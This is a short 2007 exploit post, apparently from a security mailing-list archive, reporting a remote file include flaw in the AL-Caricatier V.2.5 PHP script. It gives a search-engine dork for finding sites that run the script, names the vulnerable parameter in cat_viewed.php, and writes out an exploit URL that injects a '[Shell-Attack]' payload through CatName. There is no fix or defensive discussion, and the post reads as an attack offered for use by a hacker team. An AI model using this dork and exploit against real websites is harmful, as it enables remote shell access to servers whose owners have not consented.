Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

C-SAM oneWallet forget password Cross Site Scripting vulnerability

VisionProject Multiple XSS vuln.

EZPhotoSales 1.9.3 Multiple Vulnerabilities

PHP mSQL (msql_connect) Buffer Overflow PoC

From:	RaeD Hasadya <raed_(at)_bsdmail.com>
Date:	06.08.2007
Subject:	AL-Caricatier V.2.5 Remote File Include

Discovred By : Hasadya Raed
----------------------------
Contact : RaeD@BsdMail.Com , Hacker_Web@W.Cn , Gunman_Pump@Hotmail.Com
----------------------------
Greetz : Muhammed Zeed , Alaadin Gamos
----------------------------
Script: AL-Caricatier,V.2.5
----------------------------
Dork: "AL-Caricatier,V.2.5"
----------------------------
B.File:
cat_viewed.php
----------------------------
Vuln code: Vul code:cat_viewed.php?op=open&CatID=$CatID&CatName=$CatName
----------------------------
Exploit:
www.name.com/AL-Caricatier,V.2.5/cat_viewed.
php?op=open&CatID=$CatID&CatName=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>